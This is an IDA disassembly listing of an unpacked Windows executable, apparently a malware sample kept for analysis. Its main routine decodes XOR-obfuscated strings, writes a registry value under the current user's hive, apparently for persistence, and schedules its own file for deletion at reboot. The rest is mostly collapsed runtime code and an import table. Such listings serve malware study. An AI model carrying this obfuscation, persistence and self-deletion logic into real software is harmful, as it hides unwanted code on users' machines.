;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : C420F7504D741916EB12B9F494ED9ECF
; File Name : u:\work\c420f7504d741916eb12b9f494ed9ecf_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00004D64 ( 19812.)
; Section size in file : 00004D64 ( 19812.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
; OS type : MS Windows
; Application type: Executable 32bit
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
_WinMain@16 proc near ; CODE XREF: start+17F�p
var_23C = byte ptr -23Ch
Dst = byte ptr -138h
var_38 = byte ptr -38h
var_4 = dword ptr -4
hInstance = dword ptr 8
hPrevInstance = dword ptr 0Ch
lpCmdLine = dword ptr 10h
nShowCmd = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 23Ch
push ebx
xor ebx, ebx
push esi
xor eax, eax
loc_40100F: ; CODE XREF: WinMain(x,x,x,x)+23�j
mov cl, byte_408050[eax]
xor cl, 0D3h
mov [ebp+eax+Dst], cl
inc eax
cmp eax, 29h
jl short loc_40100F
mov [ebp+eax+Dst], bl
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+Dst]
push eax
push 80000001h
call ds:dword_406000 ; RegCreateKeyA
mov esi, 0FFh
push esi ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
xor eax, eax
loc_40105A: ; CODE XREF: WinMain(x,x,x,x)+6E�j
mov cl, byte_408030[eax]
xor cl, 0D3h
mov [ebp+eax+Dst], cl
inc eax
cmp eax, 1Ch
jl short loc_40105A
mov [ebp+eax+Dst], bl
xor eax, eax
loc_401079: ; CODE XREF: WinMain(x,x,x,x)+8A�j
mov cl, byte_40807C[eax]
xor cl, 0D3h
mov [ebp+eax+var_38], cl
inc eax
cmp eax, 0Ah
jl short loc_401079
mov [ebp+eax+var_38], bl
lea eax, [ebp+Dst]
push eax
call ds:dword_40600C ; lstrlen
push eax
lea eax, [ebp+Dst]
push eax
push 1
push ebx
lea eax, [ebp+var_38]
push eax
push [ebp+var_4]
call ds:dword_406004 ; RegSetValueExA
push esi ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
push 32h ; Size
lea eax, [ebp+var_38]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 18h
push 104h
lea eax, [ebp+var_23C]
push eax
push ebx
call ds:dword_406010 ; GetModuleFileNameA
push 4
push ebx
lea eax, [ebp+var_23C]
push eax
call ds:dword_406014 ; MoveFileExA
pop esi
xor eax, eax
pop ebx
leave
retn 10h
_WinMain@16 endp
; ---------------------------------------------------------------------------
align 10h
; [00000060 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD "+" TO EXPAND]
pop ecx
pop ecx
retn
; [00000024 BYTES: COLLAPSED FUNCTION _fast_error_exit. PRESS KEYPAD "+" TO EXPAND]
; [000001D5 BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; [00000030 BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION __lockexit. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION __unlockexit. PRESS KEYPAD "+" TO EXPAND]
; [00000018 BYTES: COLLAPSED FUNCTION __initterm. PRESS KEYPAD "+" TO EXPAND]
; [0000006A BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+" TO EXPAND]
; [000000AF BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION sub_4014F1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000006 BYTES: COLLAPSED CHUNK OF FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION _exit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __cexit. PRESS KEYPAD "+" TO EXPAND]
; [0000000F BYTES: COLLAPSED FUNCTION __c_exit. PRESS KEYPAD "+" TO EXPAND]
; [00000177 BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO EXPAND]
; [00000039 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
; [00000164 BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO EXPAND]
; [0000005D BYTES: COLLAPSED FUNCTION __wincmdln. PRESS KEYPAD "+" TO EXPAND]
; [000000C7 BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
; [0000016C BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
; [000000A2 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
; [00000122 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
; [000001FE BYTES: COLLAPSED FUNCTION __ioinit. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401EAB proc near ; CODE XREF: start:loc_401295�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_406560
call __SEH_prolog
mov [ebp+var_1C], offset dword_4071BC
loc_401EBE: ; CODE XREF: sub_401EAB+3C�j
cmp [ebp+var_1C], offset dword_4071BC
jnb short loc_401EE9
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_401EDF
call eax
jmp short loc_401EDF
; ---------------------------------------------------------------------------
loc_401ED8: ; DATA XREF: .rdata:stru_406560�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_401EDC: ; DATA XREF: .rdata:stru_406560�o
mov esp, [ebp+ms_exc.old_esp]
loc_401EDF: ; CODE XREF: sub_401EAB+27�j
; sub_401EAB+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_401EBE
; ---------------------------------------------------------------------------
loc_401EE9: ; CODE XREF: sub_401EAB+1A�j
call __SEH_epilog
retn
sub_401EAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void sub_401EEF(void)
sub_401EEF proc near ; DATA XREF: __cinit:loc_401413�o
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset stru_406570
call __SEH_prolog
mov [ebp+var_1C], offset dword_4071C4
loc_401F02: ; CODE XREF: sub_401EEF+3C�j
cmp [ebp+var_1C], offset dword_4071C4
jnb short loc_401F2D
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+var_1C]
mov eax, [eax]
test eax, eax
jz short loc_401F23
call eax
jmp short loc_401F23
; ---------------------------------------------------------------------------
loc_401F1C: ; DATA XREF: .rdata:stru_406570�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_401F20: ; DATA XREF: .rdata:stru_406570�o
mov esp, [ebp+ms_exc.old_esp]
loc_401F23: ; CODE XREF: sub_401EEF+27�j
; sub_401EEF+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
add [ebp+var_1C], 4
jmp short loc_401F02
; ---------------------------------------------------------------------------
loc_401F2D: ; CODE XREF: sub_401EEF+1A�j
call __SEH_epilog
retn
sub_401EEF endp
; =============== S U B R O U T I N E =======================================
sub_401F33 proc near ; CODE XREF: __mtinit+94�p
; DATA XREF: __mtinit+80�o ...
call ds:dword_406068 ; TlsAlloc
retn 4
sub_401F33 endp
; [0000001D BYTES: COLLAPSED FUNCTION __mtterm. PRESS KEYPAD "+" TO EXPAND]
; [00000071 BYTES: COLLAPSED FUNCTION __getptd. PRESS KEYPAD "+" TO EXPAND]
; [0000012D BYTES: COLLAPSED FUNCTION _freefls(x). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4020F7 proc near ; DATA XREF: .rdata:stru_406580�o
xor edi, edi
mov esi, [ebp+8]
sub_4020F7 endp ; sp-analysis failed
; [00000009 BYTES: COLLAPSED FUNCTION sub_4020FC. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_402105 proc near ; DATA XREF: .rdata:00406594�o
mov esi, [ebp+8]
sub_402105 endp ; sp-analysis failed
; [00000009 BYTES: COLLAPSED FUNCTION sub_402108. PRESS KEYPAD "+" TO EXPAND]
; [000000EF BYTES: COLLAPSED FUNCTION __mtinit. PRESS KEYPAD "+" TO EXPAND]
; [0000001A BYTES: COLLAPSED FUNCTION ___heap_select. PRESS KEYPAD "+" TO EXPAND]
; [00000051 BYTES: COLLAPSED FUNCTION __heap_init. PRESS KEYPAD "+" TO EXPAND]
align 4
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; [000000E6 BYTES: COLLAPSED FUNCTION __except_handler3. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION _seh_longjmp_unwind(x). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003D BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
; [00000049 BYTES: COLLAPSED FUNCTION __mtinitlocks. PRESS KEYPAD "+" TO EXPAND]
; [00000055 BYTES: COLLAPSED FUNCTION __mtdeletelocks. PRESS KEYPAD "+" TO EXPAND]
; [00000015 BYTES: COLLAPSED FUNCTION __unlock. PRESS KEYPAD "+" TO EXPAND]
; [00000097 BYTES: COLLAPSED FUNCTION __mtinitlocknum. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION sub_402557. PRESS KEYPAD "+" TO EXPAND]
; [00000031 BYTES: COLLAPSED FUNCTION __lock. PRESS KEYPAD "+" TO EXPAND]
; [00000080 BYTES: COLLAPSED FUNCTION __onexit_lk. PRESS KEYPAD "+" TO EXPAND]
; [00000028 BYTES: COLLAPSED FUNCTION ___onexitinit. PRESS KEYPAD "+" TO EXPAND]
; [00000032 BYTES: COLLAPSED FUNCTION __onexit. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION sub_40266B. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _atexit. PRESS KEYPAD "+" TO EXPAND]
; [000000F9 BYTES: COLLAPSED FUNCTION ___crtMessageBoxA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E8 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000124 BYTES: COLLAPSED FUNCTION _strncpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000008B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [0000001D BYTES: COLLAPSED CHUNK OF FUNCTION sub_402A6C. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_402A58 proc near ; DATA XREF: .rdata:stru_406668�o
xor eax, eax
inc eax
retn
sub_402A58 endp
; =============== S U B R O U T I N E =======================================
sub_402A5C proc near ; DATA XREF: .rdata:stru_406668�o
mov esp, [ebp-18h]
sub_402A5C endp ; sp-analysis failed
; [0000000D BYTES: COLLAPSED CHUNK OF FUNCTION sub_402A6C. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION sub_402A6C. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _x_ismbbtype. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _setSBCS. PRESS KEYPAD "+" TO EXPAND]
; [0000018C BYTES: COLLAPSED FUNCTION _setSBUpLow. PRESS KEYPAD "+" TO EXPAND]
; [00000190 BYTES: COLLAPSED FUNCTION __setmbcp_lk. PRESS KEYPAD "+" TO EXPAND]
; [00000147 BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION sub_402F79. PRESS KEYPAD "+" TO EXPAND]
; [0000001E BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+" TO EXPAND]
; [00000053 BYTES: COLLAPSED FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION sub_402FF3. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000015 BYTES: COLLAPSED CHUNK OF FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
; [0000006F BYTES: COLLAPSED FUNCTION __heap_alloc. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_403080 proc near ; DATA XREF: .rdata:stru_406698�o
mov esi, [ebp+8]
sub_403080 endp ; sp-analysis failed
; [00000009 BYTES: COLLAPSED FUNCTION sub_403083. PRESS KEYPAD "+" TO EXPAND]
; [0000002C BYTES: COLLAPSED FUNCTION __nh_malloc. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000033D BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND]
; [00000010 BYTES: COLLAPSED FUNCTION __crtInitCritSecNoSpinCount(x,x). PRESS KEYPAD "+" TO EXPAND]
; [0000008B BYTES: COLLAPSED FUNCTION ___crtInitCritSecAndSpinCount. PRESS KEYPAD "+" TO EXPAND]
; [000000A7 BYTES: COLLAPSED FUNCTION _calloc. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40354F proc near ; DATA XREF: .rdata:stru_4066E0�o
mov esi, [ebp+0Ch]
sub_40354F endp ; sp-analysis failed
; [00000009 BYTES: COLLAPSED FUNCTION sub_403552. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000008 BYTES: COLLAPSED CHUNK OF FUNCTION _calloc. PRESS KEYPAD "+" TO EXPAND]
; [000000D0 BYTES: COLLAPSED FUNCTION ___freetlocinfo. PRESS KEYPAD "+" TO EXPAND]
; [000000C1 BYTES: COLLAPSED FUNCTION ___updatetlocinfo_lk. PRESS KEYPAD "+" TO EXPAND]
; [00000032 BYTES: COLLAPSED FUNCTION ___updatetlocinfo. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION sub_403726. PRESS KEYPAD "+" TO EXPAND]
; [00000048 BYTES: COLLAPSED FUNCTION ___sbh_heap_init. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
; [00000318 BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND]
; [000000B7 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+" TO EXPAND]
; [00000106 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
; [000002DF BYTES: COLLAPSED FUNCTION ___sbh_resize_block. PRESS KEYPAD "+" TO EXPAND]
; [000002FC BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__NLG_Notify1:
push ebx
push ecx
mov ebx, offset dword_4085A4
jmp short loc_404334
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
; [00000229 BYTES: COLLAPSED FUNCTION __ValidateEH3RN. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION __errno. PRESS KEYPAD "+" TO EXPAND]
; [00000160 BYTES: COLLAPSED FUNCTION _realloc. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4046D4 proc near ; DATA XREF: .rdata:stru_406880�o
xor ebx, ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
sub_4046D4 endp ; sp-analysis failed
; [00000009 BYTES: COLLAPSED FUNCTION sub_4046DC. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [0000003C BYTES: COLLAPSED CHUNK OF FUNCTION _realloc. PRESS KEYPAD "+" TO EXPAND]
; [0000006A BYTES: COLLAPSED FUNCTION __msize. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40478B proc near ; DATA XREF: .rdata:stru_406890�o
mov esi, [ebp-1Ch]
sub_40478B endp ; sp-analysis failed
; [00000009 BYTES: COLLAPSED FUNCTION sub_40478E. PRESS KEYPAD "+" TO EXPAND]
; [00000066 BYTES: COLLAPSED FUNCTION ___security_init_cookie. PRESS KEYPAD "+" TO EXPAND]
; [00000147 BYTES: COLLAPSED FUNCTION ___security_error_handler. PRESS KEYPAD "+" TO EXPAND]
db 0CCh
; [000003BC BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS KEYPAD "+" TO EXPAND]
; [000001BA BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION __callnewh. PRESS KEYPAD "+" TO EXPAND]
; [00000190 BYTES: COLLAPSED FUNCTION __free_lc_time. PRESS KEYPAD "+" TO EXPAND]
; [0000005F BYTES: COLLAPSED FUNCTION ___free_lconv_num. PRESS KEYPAD "+" TO EXPAND]
; [000000D9 BYTES: COLLAPSED FUNCTION ___free_lconv_mon. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000046 BYTES: COLLAPSED FUNCTION _strcspn. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000088 BYTES: COLLAPSED FUNCTION _strcmp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000B8 BYTES: COLLAPSED FUNCTION _memcmp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000039 BYTES: COLLAPSED FUNCTION _strncmp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000040 BYTES: COLLAPSED FUNCTION _strpbrk. PRESS KEYPAD "+" TO EXPAND]
; [0000033D BYTES: COLLAPSED FUNCTION _memcpy_0. PRESS KEYPAD "+" TO EXPAND]
; [00000043 BYTES: COLLAPSED FUNCTION ___ansicp. PRESS KEYPAD "+" TO EXPAND]
; [000001C9 BYTES: COLLAPSED FUNCTION ___convertcp. PRESS KEYPAD "+" TO EXPAND]
; [000000E3 BYTES: COLLAPSED FUNCTION __resetstkoflw. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000004E BYTES: COLLAPSED FUNCTION ___ascii_stricmp. PRESS KEYPAD "+" TO EXPAND]
; [00000088 BYTES: COLLAPSED FUNCTION _atol. PRESS KEYPAD "+" TO EXPAND]
; [00000077 BYTES: COLLAPSED FUNCTION ___isctype_mt. PRESS KEYPAD "+" TO EXPAND]
align 10h
__allmul:
mov eax, [esp+8]
mov ecx, [esp+10h]
or ecx, eax
mov ecx, [esp+0Ch]
jnz short loc_405B59
mov eax, [esp+4]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_405B59: ; CODE XREF: .text:00405B4E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+8]
mul dword ptr [esp+14h]
add ebx, eax
mov eax, [esp+8]
mul ecx
add edx, ebx
pop ebx
retn 10h
; ---------------------------------------------------------------------------
align 10h
; [00000061 BYTES: COLLAPSED FUNCTION ___ascii_strnicmp. PRESS KEYPAD "+" TO EXPAND]
align 10h
__aulldvrm:
push esi
mov eax, [esp+14h]
or eax, eax
jnz short loc_405C21
mov ecx, [esp+10h]
mov eax, [esp+0Ch]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8]
div ecx
mov esi, eax
mov eax, ebx
mul dword ptr [esp+10h]
mov ecx, eax
mov eax, esi
mul dword ptr [esp+10h]
add edx, ecx
jmp short loc_405C68
; ---------------------------------------------------------------------------
loc_405C21: ; CODE XREF: .text:00405BF7�j
mov ecx, eax
mov ebx, [esp+10h]
mov edx, [esp+0Ch]
mov eax, [esp+8]
loc_405C2F: ; CODE XREF: .text:00405C39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_405C2F
div ebx
mov esi, eax
mul dword ptr [esp+14h]
mov ecx, eax
mov eax, [esp+10h]
mul esi
add edx, ecx
jb short loc_405C5D
cmp edx, [esp+0Ch]
ja short loc_405C5D
jb short loc_405C66
cmp eax, [esp+8]
jbe short loc_405C66
loc_405C5D: ; CODE XREF: .text:00405C4D�j
; .text:00405C53�j
dec esi
sub eax, [esp+10h]
sbb edx, [esp+14h]
loc_405C66: ; CODE XREF: .text:00405C55�j
; .text:00405C5B�j
xor ebx, ebx
loc_405C68: ; CODE XREF: .text:00405C1F�j
sub eax, [esp+8]
sbb edx, [esp+0Ch]
neg edx
neg eax
sbb edx, 0
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
pop esi
retn 10h
; ---------------------------------------------------------------------------
align 10h
; [00000005 BYTES: COLLAPSED CHUNK OF FUNCTION _strchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000BE BYTES: COLLAPSED FUNCTION _strchr. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405D5E proc near ; CODE XREF: __global_unwind2+13�p
jmp ds:dword_4060B8
sub_405D5E endp
_text ends
; Section 2. (virtual address 00006000)
; Virtual size : 00001756 ( 5974.)
; Section size in file : 00001756 ( 5974.)
; Offset to raw data for section: 00006000
; Flags 40000040: Data Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 406000h
dword_406000 dd 77DD72F0h ; DATA XREF: WinMain(x,x,x,x)+3C�r
dword_406004 dd 77DD59F0h ; DATA XREF: WinMain(x,x,x,x)+AF�r
dd 0
dword_40600C dd 77E74672h ; DATA XREF: WinMain(x,x,x,x)+97�r
dword_406010 dd 77E7A099h ; DATA XREF: WinMain(x,x,x,x)+DF�r
; __NMSG_WRITE+81�r ...
dword_406014 dd 77E645E4h ; DATA XREF: WinMain(x,x,x,x)+EF�r
dword_406018 dd 77E79F93h ; DATA XREF: start+6D�r
; unknown_libname_1+5�r ...
dword_40601C dd 77E6177Ah ; DATA XREF: start+159�r __ioinit+5D�r
dword_406020 dd 77E7C938h ; DATA XREF: start:loc_4012AE�r
dword_406024 dd 77E7C657h ; DATA XREF: start+20�r
dword_406028 dd 77E75CB5h ; DATA XREF: unknown_libname_1+29�r
; sub_402A6C-7�r
dword_40602C dd 77E7A5FDh ; DATA XREF: unknown_libname_1+15�r
; __mtinit+24�r ...
dword_406030 dd 77E616B4h ; DATA XREF: _doexit+2E�r
dword_406034 dd 77E79C90h ; DATA XREF: _doexit+27�r
dword_406038 dd 77E79D8Ch ; DATA XREF: __NMSG_WRITE+155�r
dword_40603C dd 77E79C3Dh ; DATA XREF: __NMSG_WRITE+14E�r
; __ioinit+188�r
dword_406040 dd 77EB9A84h ; DATA XREF: __XcptFilter+159�r
dword_406044 dd 77E9C5B1h ; DATA XREF: ___crtGetEnvironmentStringsA+113�r
dword_406048 dd 77E67702h ; DATA XREF: ___crtGetEnvironmentStringsA:loc_401C62�r
dword_40604C dd 77E7C9E1h ; DATA XREF: ___crtGetEnvironmentStringsA+C1�r
dword_406050 dd 77E79924h ; DATA XREF: ___crtGetEnvironmentStringsA:loc_401BFA�r
; ___crtLCMapStringA+22D�r ...
dword_406054 dd 77F5157Dh ; DATA XREF: ___crtGetEnvironmentStringsA:loc_401BBB�r
; __getptd+2�r ...
dword_406058 dd 77E77EE1h ; DATA XREF: ___crtGetEnvironmentStringsA+B�r
dword_40605C dd 77E7C931h ; DATA XREF: __ioinit+1EE�r
dword_406060 dd 77E78406h ; DATA XREF: __ioinit+107�r
; __ioinit+196�r
dword_406064 dd 77F53275h ; DATA XREF: __mtdeletelocks+1�r
dword_406068 dd 77E7C5B4h ; DATA XREF: sub_401F33�r
dword_40606C dd 77F51587h ; DATA XREF: __getptd+66�r
; ___crtInitCritSecAndSpinCount+79�r
dword_406070 dd 77E77CC4h ; DATA XREF: __getptd+4F�r __mtinit+D5�r ...
dword_406074 dd 77E72B29h ; DATA XREF: __mtinit+7B�r
dword_406078 dd 77E79B39h ; DATA XREF: __mtinit+71�r
dword_40607C dd 77E78B61h ; DATA XREF: __mtinit+67�r
dword_406080 dd 77E76E0Bh ; DATA XREF: __heap_init+44�r
dword_406084 dd 77E7C726h ; DATA XREF: __heap_init+11�r
dword_406088 dd 77E79E34h ; DATA XREF: ___sbh_free_block+22F�r
dword_40608C dd 77F51597h ; DATA XREF: _free+65�r
; ___sbh_free_block+2B4�r ...
dword_406090 dd 77F7E300h ; DATA XREF: __unlock+D�r
dword_406094 dd 77F7E21Fh ; DATA XREF: __lock+28�r
dword_406098 dd 77E805D8h ; DATA XREF: ___crtMessageBoxA+18�r
dword_40609C dd 77E7A13Fh ; DATA XREF: __setmbcp+4C�r
dword_4060A0 dd 77E6C703h ; DATA XREF: __setmbcp+35�r
dword_4060A4 dd 77E7849Fh ; DATA XREF: _setSBUpLow+1C�r
; __setmbcp_lk+3A�r ...
dword_4060A8 dd 77F516F8h ; DATA XREF: __heap_alloc+63�r
; _calloc+82�r ...
dword_4060AC dd 77E79908h ; DATA XREF: __crtInitCritSecNoSpinCount(x,x)+4�r
dword_4060B0 dd 77E7980Ah ; DATA XREF: ___sbh_alloc_new_region+7E�r
; ___sbh_alloc_new_group+52�r ...
dword_4060B4 dd 77F5722Fh ; DATA XREF: ___sbh_alloc_new_region+27�r
; _realloc+137�r ...
dword_4060B8 dd 77F6183Eh ; DATA XREF: sub_405D5E�r
dword_4060BC dd 77E775F1h ; DATA XREF: __ValidateEH3RN+131�r
; __ValidateEH3RN+196�r ...
dword_4060C0 dd 77E7F044h ; DATA XREF: __ValidateEH3RN+B3�r
; __resetstkoflw+1A�r ...
dword_4060C4 dd 77F522F2h ; DATA XREF: __msize+5A�r
dword_4060C8 dd 77E802FCh ; DATA XREF: ___security_init_cookie+43�r
dword_4060CC dd 77E7751Ah ; DATA XREF: ___security_init_cookie+37�r
dword_4060D0 dd 77E80656h ; DATA XREF: ___security_init_cookie+27�r
dword_4060D4 dd 77E6167Bh ; DATA XREF: ___security_init_cookie+1B�r
dword_4060D8 dd 77E77405h ; DATA XREF: ___crtLCMapStringA+2C3�r
; ___crtLCMapStringA+344�r ...
dword_4060DC dd 77E77CCEh ; DATA XREF: ___crtLCMapStringA+C0�r
; ___crtLCMapStringA+141�r ...
dword_4060E0 dd 77E781F9h ; DATA XREF: ___crtLCMapStringA+27�r
; ___crtLCMapStringA+15B�r ...
dword_4060E4 dd 77E641EBh ; DATA XREF: ___crtGetStringTypeA+19C�r
dword_4060E8 dd 77E7C866h ; DATA XREF: ___crtGetStringTypeA+24�r
; ___crtGetStringTypeA+128�r
dword_4060EC dd 77E7513Ch ; DATA XREF: ___ansicp+20�r
dword_4060F0 dd 77E6169Ah ; DATA XREF: __resetstkoflw+D5�r
dword_4060F4 dd 77E7C3A5h ; DATA XREF: __resetstkoflw+2B�r
dd 3 dup(0)
dd 46B81566h, 0
